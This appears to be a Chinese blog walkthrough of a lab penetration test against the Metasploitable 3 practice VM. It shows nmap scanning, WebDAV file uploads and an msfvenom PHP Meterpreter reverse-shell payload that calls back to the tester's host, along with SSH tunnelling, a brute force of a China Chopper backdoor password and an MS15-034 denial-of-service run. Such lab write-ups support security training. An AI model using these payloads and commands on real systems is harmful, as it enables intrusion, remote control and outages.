標籤:

Metasploitable 3 實戰滲透測試

03-08

本文根據年終福利大放送!!Metasploitable 3最新實戰滲透教程(附PPT)的教程操作完成,感謝demon – 即刻安全 的分享

一、Metasploitable 3簡介

Metasploitable 2 大家都知道,這是一個基於 Ubuntu 的安全工具測試及滲透演練環境。但 Metasploitable 2 的不足之處也顯而易見,再加上Rapid 7 官方長時間的沒有更新及維護,導致 Metasploitable 2 越來越不適用於當前的滲透環境。而 Metasploitable 3 的橫空出世,則恰好彌補了這些缺陷。

  • Metasploitable 2 更多的時候是配合 Metasploit 的模塊進行使用,基本不用費很長時間

比如拿起一個 ms-080_67 就開始找溢出漏洞,然後完結,這TM也叫黑客攻擊?

  • 怎麼辦呢?讓 Metasploitable 3 更加難以被攻破!

對的,這兩位小哥給自己設計的靶機系統加上了防火牆…他們解釋到 Metasploitable 3 內置一些安全機制,比如防火牆,許可權設置等。此外,Metasploitable 3中有些漏洞在 Metasploit 中並沒有漏洞利用模塊,需要測試人員自己挖掘。但是還沒完,為了讓Metasploitable 3 更加有趣,這兩位小哥往裡面加入了 flag。這樣大家就可以在裡面開開心心的玩 CTF 啦!

  • 不過一台 Metasploitable 怎麼可能夠用,真實的黑客攻擊中往往都會牽連到很多伺服器和計算機。

比如入侵路由器後又逐步入侵相關個人電腦,交換機,伺服器等。所以,Metasploitable 3 是可以擴展的,你可以將Metasploitable 3安裝到多台終端設備內,並且建立相關節點。

二、參考 PTES 滲透執行標準

1.前期交互階段

前期交互階段通常是由你與客戶組織進行討論,來確定滲透測試的範圍與目標。

2.信息收集

情報搜集階段對目標進行一系列踩點,包括:使用社交媒體網 Google Hacking 技術目標系統踩點等等,從而獲知它的行為模式、運行機理。

3.威脅建模階段

威脅建模主要使用你在情報搜集階段所獲取的信息,來標識出目標系統上可能存在的安全漏洞與弱點。

4.漏洞分析階段

漏洞分析階段主要是從前面幾個環節獲取的信息,並從中分析和理解哪些攻擊途徑會是可行的。

5.滲透攻擊階段

滲透攻擊主要是針對目標系統實施已經經過了深入研究和測試的滲透攻擊,並不是進行大量漫無目的的滲透測試。

6.後滲透攻擊階段

後滲透攻擊階段從你已經攻陷了客戶組織的一些系統或取得域管理員許可權之後開始,將以特定業務系統為目標,標識出關鍵的基礎設施,並尋找客戶組織最具價值和嘗試進行安全保護的信息和資產,並需要演示出能夠對客戶組織造成最重要業務影響的攻擊途徑。

三、滲透測試初體驗

0.初始環境

靶機(192.168.56.101):

kali(192.168.56.210):

1.靶機環境掃描(信息收集)

使用nmap對靶機進行掃描

root@kali:~# nmap -p- -sS -sV -n -v --reason --open -oX demon.xml 192.168.56.101

幾個參數的解釋:

-sS Tcp SYN Scan (sS) 這是一個基本的掃描方式,它被稱為半開放掃描 ,Nmap發送SYN包到遠程主機,但是它不會產生任何會話.因此不會在目標主機上產生任何日誌記錄,因為沒有形成會話
-sV 版本檢測是用來掃描目標主機和埠上運行的軟體的版本
--open 僅僅顯示開啟的埠
--reason 顯示埠處於特殊狀態
-n 不進行dns解析操作 (本地搭建環境,不用dns解析)
-oX XML XML格式 (我們需要導入到metasploit裡面,以便我們更好的 下次查看)

msfconsole中創建工作環境並導入掃描結果:

msf > workspace -a win08-r2
[*] Added workspace: win08-r2
msf > workspace win08-r2
[*] Workspace: win08-r2
msf > db_import demon.xml
[*] Importing Nmap XML data
[*] Import: Parsing with Nokogiri v1.8.4
[*] Importing host 192.168.56.101
[*] Successfully imported /root/demon.xml
msf > services
Services
========

host port proto name state info
---- ---- ----- ---- ----- ----
192.168.56.101 21 tcp ftp open Microsoft ftpd
192.168.56.101 22 tcp ssh open OpenSSH 7.1 protocol 2.0
192.168.56.101 80 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
192.168.56.101 1617 tcp rmiregistry open Java RMI
192.168.56.101 4848 tcp ssl/http open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
192.168.56.101 5985 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
192.168.56.101 8022 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.56.101 8080 tcp http open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
192.168.56.101 8282 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.56.101 8484 tcp http open Jetty winstone-2.8
192.168.56.101 8585 tcp http open Apache httpd 2.2.21 (Win64) PHP/5.3.10 DAV/2
192.168.56.101 9200 tcp http open Elasticsearch REST API 1.1.1 name: Damon Dran; Lucene 4.7
192.168.56.101 49153 tcp msrpc open Microsoft Windows RPC
192.168.56.101 49154 tcp msrpc open Microsoft Windows RPC
192.168.56.101 49155 tcp msrpc open Microsoft Windows RPC
192.168.56.101 49181 tcp rmiregistry open Java RMI
192.168.56.101 49182 tcp tcpwrapped open

或直接使用:

msf > db_nmap -sS -sV -sC -p- -n -v 192.168.56.101

2.威脅建模與漏洞分析(埠與服務驗證)

3.漏洞分析、滲透攻擊、後滲透攻擊

(1)WebDAV服務漏洞

WebDAV是基於Web服務的擴展服務。它允許用戶像操作本地文件一樣,操作伺服器上的文件。藉助該功能,用戶很方便的在網路上存儲自己的文件。為了方便用戶使用,通常會提供給用戶較大的文件許可權,如上傳、修改甚至是執行許可權。Kali Linux提供了一款WebDAV服務漏洞利用工具DAVTest。該工具會自動檢測許可權,尋找可執行文件的許可權。一旦發現,用戶就可以上傳內置的後門工具,對伺服器進行控制。同時,該工具可以上傳用戶指定的文件,便於後期利用。

DAVTest說明:

DAVTest 上傳測試的可執行文件,然後(可選)上傳文件,允許用於執行命令,或者直接在目標上其他操作測試啟用的WebDAV伺服器。它的目的是滲透測試快速,輕鬆地確定是否啟用DAV服務攻擊。

DAVTest支持:

  • 自動發送文件漏洞
  • 目錄自動隨機幫助隱藏文件
  • 發送文本文件,並嘗試MOVE到可執行文件的名稱
  • 上傳的文件自動清理
  • 發送任意文件

root@kali:~# davtest -url http://192.168.56.101:8585/uploads/
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.56.101:8585/uploads
********************************************************
NOTE Random string for this session: UudtI1Re3
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3
********************************************************
Sending test files
PUT cgi SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.cgi
PUT cfm SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.cfm
PUT html SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.html
PUT php SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.php
PUT pl SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.pl
PUT asp SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.asp
PUT shtml SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.shtml
PUT aspx SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.aspx
PUT jhtml SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.jhtml
PUT txt SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.txt
PUT jsp SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.jsp
********************************************************
Checking for test file execution
EXEC cgi FAIL
EXEC cfm FAIL
EXEC html SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.html
EXEC php SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.php
EXEC pl FAIL
EXEC asp FAIL
EXEC shtml FAIL
EXEC aspx FAIL
EXEC jhtml FAIL
EXEC txt SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.txt
EXEC jsp FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.cgi
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.cfm
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.html
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.php
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.pl
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.asp
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.shtml
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.aspx
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.jhtml
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.txt
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.jsp
Executes: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.html
Executes: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.php
Executes: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.txt

root@kali:~#

生成攻擊載荷並上傳:

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.210 LPORT=6666 -f raw >demon.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30305 bytes

root@kali:~# davtest -url http://192.168.56.101:8585/uploads/ -uploadfile demon.php -uploadloc DavTestDir_12ja05EL/6666.php
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.56.101:8585/uploads
********************************************************
unless Uploading file
Upload succeeded: http://192.168.56.101:8585/uploads/DavTestDir_12ja05EL/6666.php

查看上傳情況:

開始滲透測試:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.56.210
LHOST => 192.168.56.210
msf exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.210:6666

遠程點擊上傳的文件:

獲得Meterpreter,開始滲透:

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.210:6666
[*] Meterpreter session 1 opened (192.168.56.210:6666 -> 192.168.56.101:49308) at 2018-12-24 04:40:54 -0500

meterpreter >
meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
------- -----------
portfwd Forward a local port to a remote service

Stdapi: System Commands
=======================

Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target systems local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS

Stdapi: Audio Output Commands
=============================

Command Description
------- -----------
play play an audio file on target system, nothing written on disk
meterpreter > ls
Listing: C:wampwwwuploadsDavTestDir_12ja05EL
================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 30305 fil 2018-12-23 22:34:06 -0500 6666.php
100666/rw-rw-rw- 44 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.asp
100666/rw-rw-rw- 44 fil 2018-12-23 22:28:26 -0500 davtest_12ja05EL.aspx
100666/rw-rw-rw- 42 fil 2018-12-23 22:28:26 -0500 davtest_12ja05EL.cfm
100666/rw-rw-rw- 66 fil 2018-12-23 22:28:26 -0500 davtest_12ja05EL.cgi
100666/rw-rw-rw- 26 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.html
100666/rw-rw-rw- 37 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.jhtml
100666/rw-rw-rw- 37 fil 2018-12-23 22:28:26 -0500 davtest_12ja05EL.jsp
100666/rw-rw-rw- 24 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.php
100666/rw-rw-rw- 66 fil 2018-12-23 22:28:26 -0500 davtest_12ja05EL.pl
100666/rw-rw-rw- 177 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.shtml
100666/rw-rw-rw- 19 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.txt

meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows NT METASPLOITABLE3 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) AMD64
Meterpreter : php/windows
meterpreter > shell
Process 3580 created.
Channel 0 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:wampinapacheApache2.2.21>

到這裡會出現異常,不管他,重新連接:

meterpreter > ps

Process List
============

PID Name User Path
--- ---- ---- ----
0 System Idle Process NT AUTHORITYSYSTEM System Idle Process
4 System N/A System
12 svchost.exe N/A svchost.exe
252 smss.exe N/A smss.exe
324 csrss.exe N/A csrss.exe
376 csrss.exe N/A csrss.exe
...

嘗試建立遠程桌面連接:

meterpreter > portfwd add -l 8888 -p 3389 -r 192.168.56.101
[*] Local TCP relay created: :8888 <-> 192.168.56.101:3389

在kali主機上嘗試連接:

(2)ssh測試

root@kali:~# ssh [email protected]
[email protected] password:
Last login: Sun Dec 23 19:53:07 2018 from 192.168.56.210
-sh-4.3$

開啟埠轉發:

root@kali:~# ssh -L 3389:localhost:3389 [email protected]
[email protected] password:
Last login: Mon Dec 24 01:54:26 2018 from 192.168.56.210
-sh-4.3$

查看情況:

root@kali:~# nmap -p 3389 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-24 04:56 EST
Nmap scan report for 192.168.56.101
Host is up (0.00028s latency).

PORT STATE SERVICE
3389/tcp filtered ms-wbt-server
MAC Address: 08:00:27:85:F5:18 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.38 seconds
root@kali:~# nmap -p 3389 127.0.0.1
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-24 04:57 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000047s latency).

PORT STATE SERVICE
3389/tcp open ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds

在kali上嘗試連接:

(3)嘗試連接中國菜刀

msf > search caidao

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/caidao_bruteforce_login normal Chinese Caidao Backdoor Bruteforce
exploit/multi/http/caidao_php_backdoor_exec 2015-10-27 excellent China Chopper Caidao PHP Backdoor Code Execution
msf > use auxiliary/scanner/http/caidao_bruteforce_login
msf auxiliary(scanner/http/caidao_bruteforce_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(scanner/http/caidao_bruteforce_login) > set TARGETURI /caidao.asp
TARGETURI => /caidao.asp
msf auxiliary(scanner/http/caidao_bruteforce_login) > run

[-] 192.168.56.101:80 - Failed: admin
[-] 192.168.56.101:80 - Failed: 123456
[-] 192.168.56.101:80 - Failed: 12345
[-] 192.168.56.101:80 - Failed: 123456789
[+] 192.168.56.101:80 - Success: password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

找到連介面令:『password』

使用菜刀工具嘗試連接:

(4)80埠--http

MS15-034/CVE-2015-1635 HTTP遠程代碼執行漏洞(遠程藍屏代碼)

微軟IIS 6.0以上的的Windows Server 2008 R2/Server 2012/Server 2012

R2以及Windows 7/8/8.1操作系統都受到這個漏洞的影響

msf > search ms15_034

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/dos/http/ms15_034_ulonglongadd normal MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
msf > use auxiliary/dos/http/ms15_034_ulonglongadd
msf auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(dos/http/ms15_034_ulonglongadd) > show options

Module options (auxiliary/dos/http/ms15_034_ulonglongadd):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.101 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / no URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host

msf auxiliary(dos/http/ms15_034_ulonglongadd) >

msf auxiliary(dos/http/ms15_034_ulonglongadd) > run

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

可能是鏡像的原因,執行後,我只發現過一次藍屏,其他都是立即重啟。

參考資料:

Metasploitable3的相關資料:

Metasploitable 3正式發布,附贈全球CTF大賽?

www.freebuf.com圖標rapid7/metasploitable3?

github.com

因為安裝比較麻煩,這裡提供一個安裝好的鏡像:

鏈接: pan.baidu.com/s/18w23GS 提取碼: xmyf

TAG: |